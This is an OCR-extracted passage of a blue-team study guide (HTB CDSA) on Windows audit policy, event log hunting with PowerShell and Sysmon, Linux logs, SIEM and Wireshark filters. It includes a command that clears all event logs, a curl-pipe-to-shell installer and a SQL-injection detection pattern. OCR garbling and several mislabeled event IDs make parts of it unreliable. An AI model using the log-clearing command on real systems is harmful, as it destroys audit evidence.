C:\> auditpol /set /subcategory:"System
Integrity" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"Logon"
/success:enable /failure:enable
C:\> auditpol /set /subcategory:"Logoff"
/success:enable /failure:enable
C:\> auditpol /set /subcategory:"Account
Lockout" /success:enable /failure:enable
                     235 / 547
                     HTB CDSA
C:\> auditpol /set /subcategory:"Other
Logon/Logoff Events" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Network
Policy
Server" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"Registry"
/success:enable /failure:enable
C:\> auditpol /set /subcategory:"SAM"
/success:enable /failure:enable
C:\> auditpol /set /subcategory:"Certification
Services" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"Application
Generated" /success:enable /failure:enable
C: \> auditpol / set /subcategory: "Handle
Manipulation" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"file Share"
/success:enable /failure:enable
C:\> auditpol /set /subcategory:"filtering
Platform Packet Drop" /success:enable
/failure:enable
                     236 / 547
                     HTB CDSA
C:\> auditpol /set /subcategory:"Filtering
Platform Connection" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Other Object
Access Events" /success:enable /failure:enable
C: \> auditpol /set /subcategory: "Detailed
File Share" /success:enable /failure:enable
C: \> auditpol /set /subcategory: "Sensitive
Privilege Use" /success:enable /failure:enable
C: \> auditpol /set /subcategory: "Non
Sensitive Privilege Use" /success:enable
/failure:enable
C: \> auditpol /set /subcategory: "Other
Privilege Use Events" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Process
Termination" /success:enable /failure:enable
C:\> auditpol /set /subcategory: "DPAPI
Activity" /success:enable /failure:enable
C: \> audit pol /set /subcategory: "RPC
                     237 / 547
                     HTB CDSA
Events"
/success:enable /failure:enable
C:\> auditpol /set /subcategory:"Process
Creation" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"Audit Policy
Change" /success:enable /failure:enable
C:\> auditpol /set /subcategory:
"Authentication Policy Change" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:
"Authorization
Policy Change" /success:enable /failure:enable
C: \> audit pol /set /subcategory: "MPSSVC
Rule-Level Policy Change" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Filtering
Platform Policy Change" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Other Policy
Change Events" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"User Account
                     238 / 547
                     HTB CDSA
Management" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"Computer
Account Management" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Security
Group
Management" /success:enable /failure:enable
C:\> auditpol /set /subcategory:"Distribution
Group Management" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Application
Group Management" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Other Account
Management Events" /success:enable
/failure:enable
C:\> auditpol /set /subcategory:"Directory
Service Changes" /success:enable
/failure:enable
C: \> auditpol / set /subcategory: "Directory
Service Replication" /success:enable
/failure:enable
                     239 / 547
                          HTB CDSA
 C:\> auditpol /set /subcategory:"Detailed
 Directory Service Replication" /success:enable
 /failure:enable
 C:\> auditpol /set /subcategory:"Directory
 Service Access" /success:enable
 /failure:enable
 C:\> auditpol /set /subcategory:"Kerberos
 Service Ticket Operations" /success:enable
 /failure:enable
 C:\> auditpol /set /subcategory:"Other Account
 Logan Events" /success:enable /failure:enable
 C: \> audit pol /set /subcategory: "Kerberos
 Authentication Service" /success:enable
 /failure:enable
 C:\> auditpol /set /subcategory:"Credential
 Validation" /success:enable /failure:enable
Auditing Windows Event Logs from
command line
Running it from the command line
 wevtutil.exe
                          240 / 547
                            HTB CDSA
requesting the help menu
 wevtutil.exe /?
You can start by copying the event logs into an external
log files so that you can investigate them separately.
 C:\> wevtutil epl Security C:\<BACK UP
 PATH>\mylogs.evtx
 C:\> wevtutil epl System C:\<BACK UP
 PATH>\mylogs.evtx
 C:\> wevtutil epl Application C:\<BACK UP
 PATH>\mylogs.evtx
Auditing the application logs and returning 3 results,
descending order and text format
 wevtutil qe Application /c:3 /rd:true /f:text
Clear all logs
 PS C:\> wevtutil el I Foreach-Object {wevtutil
 cl "$_"}
Investigating Event logs with
PowerShell
Auditing all the logs in the local PC
[1]
                            241 / 547
                      HTB CDSA
 PS C:\> Get-WinEvent -ListLog * | Select-
 Object LogName, RecordCount, IsClassicLog,
 IsEnabled, LogMode, LogType | Format-Table -
 AutoSize
[2]
 PS C:\> Get-Eventlog -list
Auditing log providers
 Get-WinEvent -ListProvider * | Format-Table -
 Autosize
Listing log providers with 'powershell'
as a keyword
 Get-WinEvent -ListProvider *PowerShell
Listing events related to windows
powershell
 Get-WinEvent -ListProvider Microsoft-Windows-
 PowerShell | Format-Table Id, Description
Listing available logs containing given
keyword
                      242 / 547
                     HTB CDSA
Get-WinEvent -ListLog * | findstr “kw”
Listing events on a specific log path
Get-WinEvent -FilterHashtable
@{logname=”Microsoft-Windows-
PrintService/Admin”} | fl -property *
Finding process related information
using a given keyword about the
process
Get-WinEvent -Path .\file.evtx -FilterXPath
‘*/System/EventID=1’ | Sort-Object TimeCreated
| Where-Object {$_.Message -like “*kw*”} | fl
listing application logs from WLMS
provider and generated at the given
time
Get-WinEvent -LogName Application -FilterXPath
'*/System/Provider[@Name="WLMS"] and
*/System/TimeCreated[@SystemTime="2020-12-
15T01:09:08.940277500Z"]'
Displaying events logged for processes
initiated network connections.
                     243 / 547
                     HTB CDSA
**Get-WinEvent -Path .\file.evtx -FilterXPath
‘*/System/EventID=3’ | Sort-Object TimeCreated
| fl**
listing security logs with sam as target
usrname and event id equals to 4724
Get-WinEvent -LogName Security -FilterXPath
'*/EventData/Data[@Name="TargetUserName"]="Sam
" and */System/EventID=4724'
listing security logs with event id
equals to 400
Get-WinEvent -LogName Security -FilterXPath
'*/System/EventID=400'
listing logs from log file with event id =
104 and format as list displaying all
events properties
Get-WinEvent -Path .\merged.evtx -FilterXPath
'*/System/EventID=104' | fl -property *
listing logs from log file with event id =
4104 with string 'ScriptBlockText' and
                     244 / 547
                     HTB CDSA
format as list displaying all events
properties
Get-WinEvent -Path .\merged.evtx -FilterXPath
'*/System/EventID=4104 and
*/EventData/Data[@Name="ScriptBlockText"]' |
fl -property *
listing logs from log file with event id
=13 with string 'enc' in the message
field and format as list displaying all
events properties
Get-WinEvent -Path .\file.evtx -FilterXPath
‘*/System/EventID=13’ | Sort-Object
TimeCreated | Where-Object {$_.Message -like
“*enc*”} | fl
filtering events using time range
$aa = Get-Date -Date "date"
$ V-date = Get-Date -Date "date"
Get-WinEvent -Path .\file.evtx -FilterXPath
‘*/System/*’ | Where-Object { $_.TimeCreated -
ge $aa -and $_.TimeCreated -le $ V0U
} | Sort-Object TimeCreated
                     245 / 547
                     HTB CDSA
$a = Get-Date -Date "date"
Get-WinEvent -Path .\file.evtx -FilterXPath
‘*/System/*’ | Where-Object { $_.TimeCreated -
like $a } | fl
listing security logs with sam as target
usrname and event id equals to 4799
PS C:\> Get-WinEvent -LogName Security -
FilterXPath '*/System/EventID=4799'
Listing accounts validation logs in the
last 10 days
PS C:\> Get-Eventlog Security
4768,4771,4772,4769,4770,4649,4778,4779,4800,4
801,4802,4803,5378,5632,5633 -after ((get-
date).addDays(-10))
Auditing accounts logged on/off in the
last two days
PS C:\> Get-Eventlog Security
4625,4634,4647,4624,4625,4648,4675,6272,6273,6
274,6275,6276,6277,6278,6279,6280,4649,4778,47
79,4800,4801,4802,4803,5378,5632,5633,4964 -
after ((getdate).addDays(-2))
                     246 / 547
                     HTB CDSA
Auditing access to file shares, file
system, SAM and registry in the last
two days
PS C:\> Get-EventLog Security
4671,4691,4698,4699,4700,4701,4702,5148,5149,5
888,5889,5890,4657,5039,4659,4660,4661,4663,46
56,4658,4690,4874,4875,4880,4881,4882,4884,488
5,4888,4890,4891,4892,4895,4896,4898,5145,5140
,5142,5143,5144,5168,5140,5142,5143,5144,5168,
5140,5142,5143,5144,5168,4664,4985,5152,5153,5
031,5140,5150,5151,5154,5155,5156,5157,5158,51
59 -after ((get-date).addDays(-2))
Auditing the use of privilege
PS C:\> Get-EventLog Security 4672,4673,4674 -
after ((get-date),addDays(-1))
Auditing system changes and integrity
events
PS C:\> Get-Eventlog Security
5024,5025,5027,5028,5029,5030,5032,5033,5034,5
035,5037,5058,5059,6400,6401,6402,6403,6404,64
05,6406,6407,4608,4609 ,4616, 4621, 4610,
4611,
4614,4622,4697,4612,4615,4618,4816,5038,5056,5
                     247 / 547
                     HTB CDSA
057,5060,5061,5062,6281 -after ((get-
date).addDays(-1))
Detecting the use of psexec
Get-WinEvent -FilterHashTable
@{Logname='System';ID='7045'} | where
{$_.Message.contains("PSEXEC")}
Investigating Logs with Sysmon and
Powershell
Hunting for Metasploit events
Get-WinEvent -Path .\Filtering.evtx -
FilterXPath '*/System/EventID=3 and
*/EventData/Data[@Name="DestinationPort"] and
*/EventData/Data=4444'
Filtering for Network connections
Get-WinEvent -Path .\Filtering.evtx -
FilterXPath '*/System/EventID=3'
Filtering for Network connections in
format list with maximum quantity of
one
                     248 / 547
                       HTB CDSA
 Get-WinEvent -Path .\Filtering.evtx -
 FilterXPath '*/System/EventID=3' -MaxEvents 1
 -Oldest | fl -property *
Filtering for process access events
specifically lsass.exe
 Get-WinEvent -Path <Path to Log> -FilterXPath
 '*/System/EventID=10 and
 */EventData/Data[@Name="TargetImage"] and
 */EventData/Data="C:\Windows\system32\lsass.ex
 e"'
Filtering for Alternate Data Streams
events
 Get-WinEvent -Path <Path to Log> -FilterXPath
 '*/System/EventID=15'
Filtering for process hollowing events
 Get-WinEvent -Path <Path to Log> -FilterXPath
 '*/System/EventID=8'
Investigating IIS logs
Importing the cmdlet
                       249 / 547
                             HTB CDSA
 PS C:\> add-pssnapin WebAdministration
 PS C:\> Import-Module WebAdministration
Auditing website info
 PS C:\> Get-IISSite
Auditing the IIS logs file location
 PS C:\> (Get-WebConfigurationProperty
 '/system.applicationHost/sites/siteDefaults' -
 Name 'logfile.directory').Value
Its common practice to store the value of the log path in a
variable for easy of use in later commands. The path may
change according to your environment
 PS C:\> $L_!D0Pa+ =
 "C:\inetpub\logs\LogFiles\srvname"
Viewing the logs
 PS C:\> Get-Content $L_!D0Pa+\*.log I%{$_ -
 replace '#Fields: ', "} |?{$_ -notmatch ""#'}|
 ConvertFrom-Csv -Delimiter ''
If there is a specific log file from which you want to
extract logs, use the below command
                              250 / 547
                           HTB CDSA
 PS C:\> Get-Content iis.log I%{$_ -
 replace '#Fields: ', ''}|?{$_ -notmatch 'A#'}|
 ConvertFrom-Csv -Delimiter ' '
Extracting an IP pattern
 PS C:\> Select-String -Path $L_!D0Pa+\*.log
 -
 Pattern '192,168.*.*'
Hunting SQL Injection Patterns
 PS C:\> Select-String -Path $L_!D0Pa+\*.log
 '(@@version) | (sqlmap) | (Connect\(\)) |
 (cast\() | (char\() | ( bcha r\ () | ( sys
 databases) | ( \ (select) | (convert\ () | (
 Connect\ () | ( count\() | (sys objects)'
Investigating Windows Event Logs
with Timeline explorer
Timeline explorer      is a log analysis program that has
graphical user interface. Log files need to be in CSV
format and can be imported for analysis.
To convert an audit trail exported from windows event
logs to csv, apply the below command
 .\EvtxECmd.exe -f
 'C:\Users\user\Desktop\sysmon.evtx' --csv
                            251 / 547
                           HTB CDSA
 'C:\Users\user\Desktop\' --csvf sysmon.csv
The above command uses    EvtxECmd.exe     to perform the
process.
The below figure shows the logs after importing them to
Timeline Explorer
we can use the search bar on the upper right to search
the logs for any string.
Investigating Windows Event Logs
with Sysmon View
SysmonView is a Windows GUI-based tool that visualises
Sysmon Logs.
Before using this tool, we must export the log file's
contents into XML via Event Viewer as shown below
                           252 / 547
                            HTB CDSA
                                       sysmon view
Once the xml file is created, import it into
     Go to   File > Import Sysmon Event Logs then
     choose the XML files generated using the Event
     Viewer.
     Once loaded, the left sidebar has search functionality
     that can filter a specific process in mind.
     Choose the image path and session GUID to render the
     mapped view.
     As shown below with green highlighter, you can
     search or select the executable you want to
     investigate.
                            253 / 547
                                HTB CDSA
Investigating Windows Event Logs
with Python-evtx tools
If you are on a Linux workstation, this method may work
best for you.
Installing Dependencies
First we install the suit of tools using below command
 sudo apt install python3-evtx
Next we will download and install             cargo   because we will
need it for   chainsaw   tool
 curl https://sh.rustup.rs -S                    | sh
Follow with the prompts to complete the installation.
Then we will clone the   chainsaw             repo from github
 git clone
 https://github.com/WithSecureLabs/chainsaw.git
And then we install using below command
 cargo build -- I a
Once the build has finished, you will find a copy of the
compiled binary in the target/release folder.
Running
We can get started by running               evtx-dump.py   against any
of the event files
                                254 / 547
                             HTB CDSA
 evtx_dump.py 'Windows Powershell.evtx' >
 output.txt
This will create a text file containing all Powershell
events.
We can then use   chainsaw      to search for specific
artefacts such as hashes, IPs or even strings
 ./chainsaw search mimikatz -i
 evtx_attack_samples/
Windows Event IDs
Security
Group policy modification
     Event ID 4719
     Event ID 4739
     User created or added
     Event ID 4720
     User successfully authenticated
     Event ID 4625
     Account logon
     Event ID 4624
     Account logoff
     Event ID 4634
     Process creation
     Event ID 4688
     Execution blocked due to restrictive policy
                             255 / 547
                        HTB CDSA
Event ID 4100
Member added to a universal security group
Event ID 4104
Member added from a universal security group
Event 4756
Member removed to a global security group
Event ID 4757
Member removed from a global security group
Event ID 4728
Event ID 4729
Pass The Hash
Passing the hash will generate 2 Event ID 4776 on the
Domain Controller, the first event 4776 is generated
during the authentication of the victim computer, the
second event 4776 indicates the validation of the
account from the originating
computer (infected host), when accessing the target
workstation (victim).
Event ID 4776
Event ID 4624 with a Logon Process of NtLmSSP
and/or an Authentication Package of NTLM.
Account Lockout
Event ID 4625 and/or Event ID 4740.
Windows Security audit log was cleared
Event ID 1102
Log file was cleared
Event ID 104
Windows Event Log service was shut down
Event ID 1100
Powershell script block execution
Event ID 4104
Powershell command invocation
                        256 / 547
                            HTB CDSA
     Event ID 4103
Sysmon Events
Event ID 1: Process Creation
Event ID 5: Process Terminated
Event ID 3: Network Connection
Event ID 7: Image Loaded
Event ID 8: CreateRemoteThread [Persistence operations -
process migration]
Event ID 11: File Created
Event ID 12 / 13 / 14: Registry Event
Event ID 15: FileCreateStreamHash
Event ID 22: DNS Event
Event ID 13: Registry Value Set
Event ID 4720: New user created
Event ID 4103 : Powershell logging enabled
Event ID 4732: A member was added to a group
Event ID 4624: Pass The Hash
Linux Log Analysis
var/log/syslog
The syslog file stores all system activity,
including startup activity. Note that this is not the syslog
protocol used to collect log entries from other systems.
var/log/messages
This log contains a wide variety of general
system messages. It includes some messages logged
during startup, some messages related to mail, the
kernel, and messages related to authentication.
var/log/boot.log
This log includes entries created when the
                            257 / 547
                             HTB CDSA
system boots.
var/log/auth.log
The authentication log contains information
related to successful and unsuccessful logins in addition
to the commands executed after a session is opened due
to successful authentication.
On Debian/Ubuntu systems, this log is stored
at   /var/log/auth.log ,     while on RedHat/CentOS
systems, it is located at   /var/log/secure .
/var/log/wtmp
History of login and logout activities.
     1. /var/run/utmp: Tracks currently logged-in users.
     2. /var/log/wtmp: Maintains a historical record of
        login and logout events.
     3. /var/log/btmp: Logs unsuccessful login attempts.
        To examine a wtmp file independently,
        the   utmpdump utility can be used. It is included in
        the   util-linux package, which can be installed
        via   sudo apt install util-linux .
        var/log/faillog
        This log contains information on failed login
        attempts. It can be viewed using the faillog
        command.
        /var/log/kern.log
        The kernel log contains information logged
        by the system kernel, which is the central part of
        the Linux operating system.
        /var/log/httpd/
        If the system is configured as an Apache web
        server, you can view access and error logs within
        this directory.
      Web Servers:
                             258 / 547
                         HTB CDSA
    Nginx:
           Access
           Logs:     /var/log/nginx/access.log
           Error   Logs: /var/log/nginx/error.log
    Apache:
           Access
           Logs:    /var/log/apache2/access.log
           Error
           Logs:    /var/log/apache2/error.log
Databases:
    MySQL:
           Error Logs:    /var/log/mysql/error.log
    PostgreSQL:
           Error and Activity
           Logs: /var/log/postgresql/postgresql
           -{version}-main.log
Web Applications:
    PHP:
           Error Logs:    /var/log/php/error.log
Operating Systems:
    Linux:
           General System Logs:       /var/log/syslog
           Authentication Logs:      /var/log/auth.log
Firewalls and IDS/IPS:
    iptables:
           Firewall Logs:        /var/log/iptables.log
    Snort:
           Snort Logs:     /var/log/snort/
                         259 / 547
                     HTB CDSA
Manual Analysis
Auditing authentication logs
tail /var/log/auth. log
grep -0 "fail" /var/log/auth. log
Listing stats about services used in
authentication
cat auth.log | cut -d' ' -       6 | cut -d[ - 1 |
sort | uniq -c | sort -V
Auditing User login logs in Ubuntu
tail /var/
Auditing samba activity
grep -i samba /var/log/syslog
Auditing cron job logs
grep -i cron /var/log/syslog
Auditing sudo logs
                     260 / 547
                        HTB CDSA
grep -i sudo /var/log/auth. log
Filtering 404 logs in Apache
grep 404 apache-logs.log | grep -v -E
"favicon. ico I robots. txt"
Auditing files requested in Apache
head access_log | awk '{print $7}'
View root user command history
# cat /root/.*history
View last logins
last
Viewing SSH authentication logs
cat auth.log | grep sshd | less
Viewing stats about failed login
attempts sorted by user
                        261 / 547
                          HTB CDSA
 cat auth.log | grep Failed | cut -d: - 4 | cut
 -d' ' -f5- | rev | cut -d' ' -f6- | rev | sort
 | uniq -c | sort -V
Viewing successful authentication logs
 cat auth.log | grep Accepted
View currently logged in users
 utmpdump wtmp
Manual Log Analysis with
ULogViewer
ULogViewer can be used to analyze the following types of
log files:
   1. Apache Access Log Files: Only Apache access log
      analysis.
   2. Linux System Log Files: Only Linux system log
      analysis.
   3. Raw Text In File: Cleartext log analysis.
   4. Windows Event Log Files: Only Windows log
      analysis.
                          262 / 547
                        HTB CDSA
 5. Select the log profile to be parsed.
 6. Add the log file to be parsed.
 7. Filter logs and perform search.
 8. Delete the loaded logs from the UI.
 9. Open a new tab for a different log source.
Network Logs
                         263 / 547
                            HTB CDSA
Network logs record traffic on the network. These logs
are on a variety of devices such as routers, firewalls,
web servers, and network intrusion
detection/prevention systems. You can typically
manipulate these devices to log specific information, such
as logging all traffic that the device passes, all traffic
that the device blocks, or both. These logs are useful
when troubleshooting connectivity issues and when
identifying potential
intrusions or attacks.
Logs Centralization
SIEM
Definition
A security information and event management (SIEM)
system provides a centralized solution for collecting,
analyzing, and managing data from multiple sources.
How it works
     The SIEM collects log data from devices
     throughout the network and stores these logs in a
     searchable database. Log entries come from various
     sources, such as firewalls, routers, network
     intrusion detection and prevention systems, and
     more. They can also come from any system that an
     organization wants to monitor, such as web servers,
     proxy servers, and database servers.
     The SIEM system collects data from multiple
     systems, and these systems typically format log
     entries differently. However, the SIEM system can
     aggregate the data and store it so that it is easy to
                             264 / 547
                           HTB CDSA
     analyze and search. SIEM uses correlation engine is
     a software component used to collect and analyze
     event log data from various systems within the
     network.
     A SIEM typically comes with predefined alerts, which
     can provide continuous monitoring of systems and
     provide notifications of suspicious events. For
     example, if it detects a port scan on a server, it
     might send an email to an administrator group or
     display the alert on a heads-up display. SIEMs also
     include the ability to create new alerts.
     SIEMs also include automated triggers. Triggers
     cause an action in response to a predefined number
     of repeated events. As an example, imagine a trigger
     for failed logons is set at five. If an attacker
     repeatedly tries to log on to a server using Secure
     Shell (SSH), the server’s log will show the failed
     logon attempts. When the SIEM detects more than
     five failed SSH logons, it can change the environment
     and stop the attack. It might modify a firewall to
     block these SSH logon attempts or send a script to
     the server to temporarily disable SSH. A SIEM
     includes the ability to modify predefined triggers and
     create new ones.
Syslog Protocol
Definition
The syslog protocol specifies a general log entry format
and the details on how to transport log entries. You can
deploy a centralized syslog server
to collect syslog entries from a variety of devices in the
network, similar to how a SIEM server collects log
                            265 / 547
                             HTB CDSA
entries.
How it works
Any systems sending syslog messages are originators.
They send syslog log entries to a collector (a syslog
server). The collector can receive messages from external
devices or services and applications on the same system.
For example, Linux systems include the      syslogd
daemon ,   which is the service that handles the syslog
messages. It collects the entries and processes them
based on entries in the   /etc/syslog.conf file. Many
syslog messages are    routed to the /var/syslog file.
Syslog Software Tools For Linux
#Syslog-ng
Syslog-ng extends syslogd, allowing a system to
collect logs from any source. It also includes correlation
and routing abilities to route log entries to any log
analysis tool. It provides rich filtering capabilities,
content-based filtering, and
can be extended with tools and modules written in other
languages. It supports TCP and TLS.
#Rsyslog
Rsyslog came out later as an improvement over
syslog-ng. One significant change is the ability to send log
entries directly into database engines. It also supports
TCP and TLS.
Syslog Software Tools For Windows
#NxLog-ng
NxLog-ng functions as a log collector, and it can integrate
with most SIEM systems.
                             266 / 547
                           HTB CDSA
Module 4: Network Traffic
Analysis
Basics
Packet Capturing
Packet capture refers to capturing network packets
transmitted over a network, and packet replay refers to
sending packets back out over the
network. You can capture packets using a protocol
analyzer, which is sometimes called sniffing or using a
sniffer.
Promiscuous Mode
When using a protocol analyzer, you need to configure the
network interface card (NIC) on the system to use
promiscuous mode. Normally, a NIC uses non-promiscuous
mode, and only processes packets addressed directly to
its IP address. However, when you put it in promiscuous
mode, it processes all packets regardless of the IP
address. This allows the protocol analyzer to capture all
packets that reach the NIC.
Traffic Analysis
Traffic Analysis is a method of intercepting,
recording/monitoring, and analyzing network data and
communication patterns to detect and respond to system
health issues, network anomalies, and threats. The
network is a rich data source, so traffic analysis is useful
for security and operational matters. The operational
issues cover system availability checks and measuring
performance, and the security issues cover anomaly and
suspicious activity detection on the network.
Note
                            267 / 547
                            HTB CDSA
The common best practice is handling medium-sized pcaps
with Wireshark, creating logs and correlating events
with Zeek, and processing multiple logs in Brim.
Wireshark
Definition
Wireshark is an open-source, cross-platform network
packet analyzer tool capable of sniffing and investigating
live traffic and inspecting packet captures (PCAP). It is
commonly used as one of the best packet analysis tools.
Dashboard
Toolbar
The main toolbar contains multiple menus and shortcuts
for packet sniffing and processing, including filtering,
sorting, summarizing, exporting and merging.
Display Filter
The main query and filtering section.
Capture Filter and Interfaces
Capture filters and available sniffing points (network
interfaces). The network interface is the connection
point between a computer and a network. The software
connection (e.g., lo, eth0 and ens33) enables networking
                            268 / 547
                           HTB CDSA
hardware.
Loading PCAP Files For Analysis
You can load a PCAP either from the file menu or from the
recent files section if you have analyzed it before.
Below we can see the processed filename, detailed
number of packets and packet details. Packet details are
shown in three different panes, which allow us to
discover them in different formats.
Packet Details Pane
Detailed protocol breakdown of the selected packet.
Packet Bytes Pane
Hex and decoded ASCII representation of the selected
packet. It highlights the packet field depending on the
                            269 / 547
                            HTB CDSA
clicked section in the details pane.
Sniffing Packets
You can use the blue "shark button" to start network
sniffing (capturing traffic), the red button will stop the
sniffing, and the green button will restart the sniffing
process. The status bar will also provide the used sniffing
interface and the number of collected packets.
Capture File Details
You can view the details by following "Statistics -->
Capture File Properties" or by clicking the "pcap icon
                            270 / 547
                           HTB CDSA
located on the left bottom" of the window.
Packet Dissection
When you click on a specific packet, you can view the
protocol and packet dissection in the details pane.
The Frame (Layer 1): This will show you what
frame/packet you are looking at and details specific to the
Physical layer of the OSI model.
Source [MAC] (Layer 2): This will show you the source
and destination MAC Addresses; from the Data Link layer
of the OSI model.
Source [IP] (Layer 3): This will show you the source and
destination IPv4 Addresses; from the Network layer of the
OSI model.
Protocol (Layer 4): This will show you details of the
protocol used (UDP/TCP) and source and destination ports;
from the Transport layer of the OSI model.
Protocol Errors: This continuation of the 4th layer shows
specific segments from TCP that needed to be
reassembled.
Application Protocol (Layer 5): This will show details
specific to the protocol used, such as HTTP, FTP,     and
SMB. From the Application layer of the OSI model.
Application Data: This extension of the 5th layer can
show the application-specific data.
Finding and Navigating Through Packets
                           271 / 547
                            HTB CDSA
Packet numbers helps to count the total number of
packets or make it easier to find/investigate specific
packets. You can use the "Go" menu and toolbar to view
specific packets.
Apart from packet number, Wireshark can find packets by
packet content. You can use the "Edit --> Find
Packet" menu to make a search inside the packets for a
particular event of interest. This helps analysts and
administrators to find specific intrusion patterns or failure
traces.
As shown below, there are two crucial points in finding
packets. The first is knowing the input type. This
functionality accepts four types of inputs (Display filter,
Hex, String and Regex). String and regex searches are the
most commonly used search types. Searches are case
insensitive, but you can set the case sensitivity in your
search by clicking the radio button.
The second point is choosing the search field. You can
conduct searches in the three panes (packet list, packet
details, and packet bytes), and it is important to know
                            272 / 547
                            HTB CDSA
the available information in each pane to find the event of
interest. For example, if you try to find the information
available in the packet details pane and conduct the
search in the packet list pane, Wireshark won't find it
even if it exists.
Filter Types
Apply as Filter
This is the most basic way of filtering traffic. While
investigating a capture file, you can click on the field you
want to filter and use the "right-click menu"
or *"Analyse --> Apply as Filter"* menu to filter the
specific value. Once you apply the filter, Wireshark will
generate the required filter query, apply it, show the
packets according to your choice, and hide the unselected
packets from the packet list pane. Note that the number
of total and displayed packets are always shown on the
status bar.
                            273 / 547
                            HTB CDSA
Conversation filter
Use this filter if you want to investigate a specific packet
number and all linked packets by focusing on IP addresses
and port numbers.
Prepare as Filter
Similar to "Apply as Filter", this option helps analysts
create display filters using the "right-click" menu.
However, unlike the previous one, this model doesn't
apply the filters after the choice. It adds the required
query to the pane and waits for the execution command
(enter) or another chosen filtering option by using the "..
and/or.." from the "right-click menu".
                            274 / 547
                           HTB CDSA
Follow Stream
Streams help analysts recreate the application-level data
and understand the event of interest. It is also possible to
view the unencrypted protocol data like usernames,
passwords and other transferred data.
Example Display Filters
                            275 / 547
                           HTB CDSA
Generally speaking, when creating display filters remember
that they follow the below rules:
     Packet filters are defined in lowercase.
     Packet filters have an autocomplete feature to break
     down protocol details, and each detail is represented
     by a "dot".
     Packet filters have a three-colour representation
     explained below. Green indicates valid filter, red
     indicates Invalid filter and yellow indicates Warning
     filter
     show packets containing the below IP
 ip.addr == 192.168.1.1
show packets not containing the below ip
 !(192.168.1.1)
show packets containing both below IPs
 ip.addr == 192.168.1.1 && ip.addr ==
 192.168.1.2
Show all packets containing IP addresses from
10.10.10.0/24 subnet
 ip.addr == 10.10.10.0/24
Show all packets originated from 10.10.10.111
                            276 / 547
                         HTB CDSA
 ip.src == 10.10.10.111
Show all TCP packets with port 80
 tcp.port == 80
Show all TCP packets originating from port 1234
 tcp.srcport == 1234
show http packets
 http
show https packets
 tcp.port == 443
Show all packets with HTTP response code "200"
 http.response.code == 200
Show all HTTP GET requests
 http.request.method == "GET"
show email packets
 smtp
Show smtp status codes
                         277 / 547
                         HTB CDSA
 smtp.response.code
show DNS packets
 dns
Show all DNS requests
 dns.flags.response == 0
And you can replace 0 with 1 to show DNS responses.
TCP ports filters
 tcp.port
 tcp.dstport
 tcp.srcport
UDP ports filters
 udp.port
 udp.dstport
 udp.srcport
Filter DNS query types records
DNS A record
 dns.qry.type == 1
DNS TXT record
                          278 / 547
                           HTB CDSA
 dns.qry.type == 16
Filtering for http methods
[GET]
 http.request.method == "GET"
[POST]
 http.request.method == "POST"
Show packets between time range
Say you want to find http traffic between 08/12/2021
11:24:00 and 01/12/2021 11:03:00 then the below filter
is used
 http and (frame.time >= "Dec 08, 2021
 11:03:00") && (frame.time <= "Dec 08, 2021
 11:24:00")
Finding domain names in https/ssl packets
First we filter for https/ssl traffic
 tcp.port == 443
Then we look for packets where the info section contains
[client hello] then follow [TCP stream].
Filtering USB Keyboard Packets
 usb.transfer_type == 0x01 and frame.len == 35
                           279 / 547
                          HTB CDSA
 and !(usb.capdata == 00:00:00:00:00:00:00:00)
Filter to detect WIFI DDOS
 wlan.fc.type_subtype == 0x00a ||
 wlan.fc.type_subtype == 0x00c
Data Extraction and Statistics
You can use the "File" menu to export packets.
Show number of packets for a specific potocal such as
http
From wireshark menu >> statistics >> protocol hierarchy
>> note the packets field that indicates the number and
the corresponding protocol.
                             280 / 547
                         HTB CDSA
Exporting images and files transferred through HTTP
 Select File -> Export Objects -> HTTP
 Selecting specific packet number
 Go -> Go to Packet
OR
 Frame.number == [99]
Extracting source or destination ip addresses from a
pcap
                         281 / 547
                            HTB CDSA
 tshark -T json -e 'ip.src' -e 'ip.dst' -r
 filename.pcap | grep '\.[0-9]' | sort -u
Or you can follow the below order from Wireshark menu
Statistics >> Conversation >> IPV4 field
Statistics
In the statistics menu, we can narrow the focus on the
scope of the traffic, available protocols, endpoints and
conversations, and some protocol-specific details
like DHCP, DNS and HTTP/2.
Resolved Addresses
This option helps analysts identify IP addresses
and DNS names available in the capture file by providing
the list of the resolved addresses and their hostnames.
                             282 / 547
                           HTB CDSA
Protocol Hierarchy
This option breaks down all available protocols from the
capture file and helps analysts view the protocols in a
tree view based on packet counters and percentages.
Thus analysts can view the overall usage of the ports and
services and focus on the event of interest.
Conversations
Conversation represents traffic between two specific
endpoints. This option provides the list of the
conversations in five base formats; ethernet, IPv4,
IPv6, TCP and UDP. Thus analysts can identify all
conversations and contact endpoints for the event of
interest.
DNS
This option breaks down all DNS packets from the capture
file and helps analysts view the findings in a tree view
based on packet counters and percentages of the DNS
protocol. Thus analysts can view the DNS service's overall
usage, including rcode, opcode, class, query type,
service and query stats and use it for the event of
interest.
*HTTP**
This option breaks down all HTTP packets from the
capture file and helps analysts view the findings in a tree
view based on packet counters and percentages of the
HTTP protocol. Thus analysts can view the HTTP service's
overall usage, including request and response codes and
the original requests.
Creating Filter Bookmarks
We can create filters and save them as bookmarks and
buttons for later usage. The filter toolbar has a filter
                            283 / 547
                            HTB CDSA
bookmark section to save user-created filters, which
helps analysts re-use favourite/complex filters with a
couple of clicks. Similar to bookmarks, you can create
filter buttons ready to apply with a single click.
                            284 / 547
HTB CDSA
285 / 547
                         HTB CDSA
Comparison Operators
[1]
 eq   OR   ==
 ne   OR   !=
 gt   OR
 lt   OR
 ge   OR   =
 le   OR   =
[2]
 "contains" : Search a value inside packets. It
 is case-sensitive and provides similar
 functionality to the "Find" option by focusing
 on a specific field.
Example: List all HTTP packets where packets' "server"
field contains the "Apache" keyword.
 http.server contains "Apache"
[3]
 "matches" : Search a pattern of a regular
 expression. It is case insensitive, and
 complex queries have a margin of error.
